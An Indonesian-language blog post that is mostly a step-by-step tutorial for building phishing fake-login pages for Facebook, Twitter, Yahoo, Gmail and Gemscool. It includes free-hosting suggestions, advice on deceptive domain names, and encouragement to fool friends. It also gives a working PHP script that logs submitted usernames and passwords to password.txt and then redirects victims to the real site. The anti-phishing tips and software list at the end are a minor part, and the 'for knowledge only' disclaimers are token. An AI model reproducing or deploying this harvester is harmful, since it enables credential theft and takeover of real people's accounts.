Phising, berasal dari kata fishing. Yap, artinya memancing.
Penjelasannya begini, phising akan mengarahkan korban ke sebuah halaman
web palsu (fake webpage) yang hampir sama persis dengan halaman web
aslinya (Spoofed webpage)
. Nah, dengan halaman palsu inilah, seorang hacker
akan memancing korban untuk memasukan informasi yang dibutuhkan,
(seperti username, password, dll). Dan ketika korban memasukan username
dan password pada halaman login palsu (fake login), maka setiap
informasi yang dimasukan akan disimpan pada webserver hacker. Kemudian
dengan username dan password yang telah tersimpan itulah, hacker dapat
leluasa memasuki akun korban dan melakukan apa saja terhadap akun korban
tersebut.
Teknik ini sendiri telah banyak digunakn/diterapkan untuk mencuri
username dan password yang sangat efektif selain dengan menggunakan
keylogger, teknik ini biasa digunakan untuk mencuri akun email (Seperti
Yahoo,Gmail,Hotmail, Dll) dan bebarapa situs jejaring sosial seperti
(Facebook,Twitter,Friendster) bahkan situs-situs transaksi online
seperti (Paypal,E-Bay) dan lain-lain.
Pada postingan saya kali ini saya akan membahas teknik untuk mencuri
password (ingat hanya sebagai wawasan) di berbagai website dan ada
beberapa tutorial yaitu untuk :
- Facebook
- Twitter
- Gemscool
- Yahoo & gMail
- Mohon maaf untuk sementara ini hanya beberapa saja
jadi situs phising ini juga dapat diartikan sebagai fake login atau
halaman palsu yang akan menyimpan data dan password korban, dan sekali
lagi saya ingatkan ini hanyalah untuk pengetahuan semata, terimakasih
dan ingat gunakanlah dengan bijak, agar indonesia maju,,hhh,oke lah saya
kira cukup basa-basinya saya kira anda sudah cukup mengerti tentang
situs phising, dan selain itu pada artikel kali ini saya juga
menyertakan cara untuk menghibdari phising dengan aman,
Langsung saja untuk cara membuat fake login atau situs phising, hampir
semua orang hacker, tau cara ini jadi untuk menjadi newbie hacker ikuti
langkah berikut ini, eitzzz, tunggu dulu masih ada syaratnya sebelum
anda membuat situs fake login atau phising anda harus mempunyai :
- Hosting & domain
- Nyali untuk berbohong hhh
- Script (tenag sudah saya sediakan)
Ada 2 cara untuk membuatnya pertama, dengan cara mudah dan cepat jadi
disni script sudah saya sediakan sendiri dan anda tinggal menguploadnya
di web hosting anda. Dan cara kedua yaitu anda membuatnya mulai dari
awal, seperti mengedit2 nama file, membuat script dll, oke langsung saja
silahkan dipilih, untuk cara mudah hanya ada 4 script yaitu
(facebook,twitter,gemscoo,yahoo&gmail) yang lainnya bisa anda buat
sendiri di cara manual.
Cara cepat atau mudah :
- Pertama-tama anda harus mempunyai sebuah webhosting
free hosting :
http://www.kilu.de/
Indo Free Hosting,
000webhost
http://www.net2ftp.com/
coba pakai Indo Free Hosting atau 000webhost
- Setelah mempunyai sebuah webhosting, nyali anda akan diuji disini, bagi anda yg sudah pernah ikut dunia
lain/pernah lihat dunia lain jadi anda pasti adalah orang yang
pemeberani, oke selanjutnya download script-script untuk persiapan hack
password nanti ada beberapa pilihan untuk download file sesuai kebutuhan
anda :
- Setelah download jangan lupa ekstrak file hasil download tadi, lalu
masuk ke file manager anda dan upload script tersebut kedalam web
hosting yang sudah anda buat tadi, cara upload masuk ke File manager
> Public_html > Upload , upload semua file yang sudah anda
download tadi, masing2 ada( contoh : index-fb.html,password.txt,logs.php
)
- Sekarang chomd file tadi ke 777, Buka file manager anda lalu centang file"password.txt" lalu pilih "CHOMD"
- Lalu centang semuanya atau ganti value menjadi 777 agar nantinya file dapat dijalankan.
- Sekarang website phising anda sudah jadi dan anda dapat menggunakan
nyali anda untuk membohongi teman anda tentang web trsbut, jadi ketika
teman anda mengetikan email dan password mereka akan langsung
terekam/tercatat pad password.txt,
- Selamat mencoba dan semoga berhasil
Cara manual :
- Pertama-tama anda harus mempunyai sebuah webhosting apabila belum
silahkan daftar pada sebuah hosting silahkan untuk daftar salah satu
webhosting baca artikel saya, dan pastikan link/domain yang anda buat hampir menipu orang seperti facebooklogin.fb.com.
- Setelah membuat webhosting, Sekarang buka halaman login situs yang
ingin anda buat fake login (login palsunya) disini saya akan gunakan
facebook sebagai contoh, pertama-tama saya buka http://facebook.com/login.php setelah itu tekan Ctrl+U ,lalu muncul sebuah halaman html untuk fake login, salin script html tersebut atau CTRL+A lalu CTRL+C dan salin dahulu ke clipboard
- Setelah itu sekarang anda salin kode yang telah anda copy tadi ke notepad, kemudian cari tulisan action=http:/nul.facebook.com dan ganti urlnya atau tulisan berwarna merah menjadi logs.php , dan juga pada method="post" diganti menjadi method="get" , contoh <form id="login_form" action=logs.php method="get" lalu simpan dengan nama "index.html"
- Lalu, buat sebuah file dengan menggunakan notepad dengan script dibawah ini lalu simpan dengan nama logs.php gunakan ansi waktu menyimpan jangan dengan text document
<?php header("Location: http://facebook.com/login.php"); $handle = fopen("password.txt",
"a"); foreach($_GET as $variable => $value) { fwrite($handle,
$variable); fwrite($handle, "="); fwrite($handle, $value);
fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle);
exit; ?>
Untuk tulisan yg berwarna Biru anda bisa ganti dengan nama tempat login lain misal di twitter
- Sekarang, buat sebuah file lagi dengan menggunakan notepad dan
jangan diisi apa-apa biarkan saja kosong lalu simpan pada folder yg sama
tempat anda meletakan file-file sebelumnya agar nanti mudah dalam
peng-uploadan, dan beri nama "password.txt"
- Selanjutnya adalah mengupload file tersebut kedalam web hosting anda
dengan cara masuk ke cPanel > File manager > Pilih direktori
public_html > Upload , dan pilih lokasi dimana file tersebut anda
simpan, lalu pilih tanda centang untuk mulai meng-upload file, setelah
itu pilih tombol back jika file berhasil diupload.
- Setelah file diupload sekarang CHOMD file password.txt ke 777 agar nantinya file dapat dieksekusi, caranya adalah centang pada file password.txt lalu klik CHOMD
- Selanjutnya centang semuanya atau ganti value menjadi 777 lalu klik simpan atau save
- Sekarang situs phising anda sudah dapat dibuka dan silahkan anda mencobanya,
anda bisa melihat hasil phising pada file password.txt
- Selamat mencoba dan semoga berhasil
Anda sekarang dapat membuat situs phising dengan mudah bukan? berikut
ini saya juga sertakan tips aman untuk menghindari situs phising, karena
situs phising ini bisa sangat berbahaya apabila disalahgunakan oleh
pihak-pihak yang tidak bertanggung jawab.
Tips aman cara mencegah dan menghindari bahaya dari situs fake login/PHISING
Lalu bagaiman caranya agar anda sendiri tidak menjadi korban para hacker
yang menggunakan metode phising dalam modus operandinya?
Nah, agar nantinya anda tidak ditertawakan oleh sang hacker, berikut tips aman untuk menghindarinya
- Jika anda mengijinkan adanya sistem pemberitahuan otomatis melalui
email, maka facebook secara rutin akan mengirimkan e-mail pemberitahuan
kepada anda jika ada teman yang mengkonfirmasi, ada komentar, ada pesan
masuk, atau yang lainnya. Di dalam e-mail pemberitahuan tersebut pasti
ada link tautan yang akan mengarahkan anda kepada halaman yang dituju
untuk melihat secara langsung isi pemberitahuan tersebut. Dan biasanya
anda langsung mengklik link tautan tersebut, Anda akan diarahkan pada
halaman aslinya, bukan pada halaman palsu? maka dari itu saya sarankan
jangan pernah mengakses situs dengan mengkliik link tersebut.
Biasakanlah selalu membuka halaman situs yang dituju langsung untuk
melihat isi pemberitahuan tersebut.
- Jika akhirnya anda mengklik link tersebut, ada baiknya teliti URL
yang ada pada address bar. Jangan pernah anda memasukan
username,password ataupun informasi pribadi anda sebelum anda yakin pada
halaman website yang asli. Biasanya walaupun tampilan halaman mirip
dengan halaman aslinya, namun URL halaman palsu tidaklah sama dengan
halaman aslinya. Misalnya http://facebook.co.cc , http://facebooklogin.16mb.com tidaklah sama dengan halaman aslinya yang http://facebook.com
. Coba anda perhatikan gambar dibawah ini, sekilas tampilan halaman
tersebut hampir sama dengan tampilan halaman log-in facebook bukan?.
Tapi coba perhatikan urlnya, tidaklah sama dengan halaman asli dari
facebook (ini adalah web phising yg telah saya buat)
- Pada
halaman login facebook yang asli, jika anda memasukan username dan
password yang salah akan tampak pesan pemberitahuan bahwa data yang anda
masukan salah. Hal ini tidak terjadi dengan halaman login yang palsu.
Ketika anda memasukan username dan password yang salah, maka halaman
login akan kembali seperti semula atau tidak terjadi apa-apa. Nah inilah
kelemahan dari situs phisiing yaitu tidaklah sama dengan halaman
aslinya
- Anda
bisa menggunakan cara ini, yaitu dengan download software anti phising
untuk menghindari situs phising yang dibuat oleh para hacker nakal yang
telah marak beredar saat ini. Berikut adalah beberapa list software anti
phisng
Download Anti phishing freeware and free phishing scam web site blocker:
- Earthlink
Toolbar Scamblocker
Offers a check towards a phishing blacklist of sites
Checks the owner and location of the web site
Prevention against phishing and pop ups
- GFI-MailEssentials
prevents spam email and phishing attacks!
Offers information about GFI-MailEssentials anti phishing software. How
to avoid being scammed, recommended by Anti-Phishing.info to help stop Phishers!
- Webroot's
Phish net
Phish Net uses a dynamic blacklist
Phish Net stores your personal, financial information and checks for an
encrypted connection known as Secure Sockets Layer (SSL) prior to transmitting
- Vault.WholeSecurity’s Web Caller-ID, not yet released
Analyzes the characteristics of a web page in real time to determine if
it is a spoof site and to deliver a browser-based warning to consumers before
they can visit the fraudulent page
- Spybot
- Search and Destroy
Free Anti-Spyware and adware. Has an option to "lock" the HOSTS
file.
Write-protect HOSTS file with Search and destroy:
1. Click "Mode", selecting "Advanced Mode".
2. Click "Tools" in the left pane.
3. Click "IE tweaks" in the right pane.
4. Check "Lock Hosts file read-only as protection against hijackers"
- SpywareBlaster
Free anti-spyware - Can encrypt and create a backups of your HOSTS file
- Winpatrol
8.0
Anti malware - Will allow you to lock your HOSTS file and will monitor changes
- CoreStreet's
Spoofstick
Helps users detect spoofed (fake) websites
- TrustWatch
Toolbar
Real-time check for if the web site you are dealing with has been Verified
by a Trusted Third Party. It is like doing a credit check of the web site
before you supply personal or confidential information
Software Anti Phising Source : http://www.anti-phishing.info
Apabila
anda sudah terlanjur memasukan email dan password di halaman tersebut
cepatlah ganti password anda, apabila sudah diganti oleh hacker. Maka
bukalah email untuk mereset dan mengembailkan akun anda.
Sekian
informasi seputar dunia IT(internet teknologi),hacking dan apabila ada
kesalahan kata penulis mohon maaf yang sebesar-besarnya, apabila ada
pertanyaan seputar post ini anda bisa hub saya melalui kotak admin
dibawah ini,kritik dan saran bisa anda sampaikan di kotak komentar,
terimakasih atas perhatianya dan kesediaan anda membaca postingan ini
Waalaikumsallam Wr. Wb.
Comments
Post a Comment